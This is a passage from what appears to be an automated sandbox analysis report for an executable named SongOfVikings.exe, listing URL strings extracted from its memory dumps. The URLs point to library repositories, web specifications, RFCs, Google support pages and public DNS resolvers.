Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/issues/183
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/pull/187
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/ssri
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/wrappy
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/sindresorhus
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/models
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tensorflow
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/text.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tflite-support
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/wasdk/wasmparser
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/web-animations/web-animations-js
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/westes/flex
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/yetingli
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/wayland/weston
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/4NeimX
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLu
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuThe
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuWebAudio.AutoplayWebAudio.Autoplay.CrossOriginWebAudio.Autoplay.UnlockType..
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/EuHzyv
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/HxfxSQ
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/J6ASzs
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/t5IS6M).
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/pay
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/payhttps://android.com/paysecure-payment-confirmationAppStoreBillingPlaceHolderZZ
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/canvas.html#concept-canvas-will-read-frequently
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/canvas.html#concept-canvas-will-read-frequentlyOut
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lists.gnu.org/archive/html/automake/2012-07/msg00001.html
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lists.gnu.org/archive/html/automake/2012-07/msg00014.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://nextdns.io/privacy
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://no-color.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/http.html#http_class_http_incomingmessage
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://odvr.nic.cz/doh
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://openjsf.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pagure.io/lohit
Source: SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google.com
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billing
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billingQuota
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/IIJ
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://semver.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com)
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sourcemaps.info/spec.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/cli.html
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/fiddle
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/206d99a16dd9212f
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/51e6959f61
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/68d284c86b082c3e
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/726219164b
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/d7be961c5c
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904742108.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904838048.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904442973.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905568619.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904504634.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903826229.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905469173.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904971935.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904188801.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904779264.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904330720.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904742108.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904838048.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904442973.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905568619.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904504634.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905010134.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903826229.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905469173.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904971935.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904126521.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904188801.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904779264.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-defineownproperty-p-de
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getownproperty-p
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getprototypeof
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-ownpropertykeys
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-timeclip
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://testanything.org/tap-version-14-specification.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://testanything.org/tap-version-14-specification.html#subtests
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2152
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6838#section-3.1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
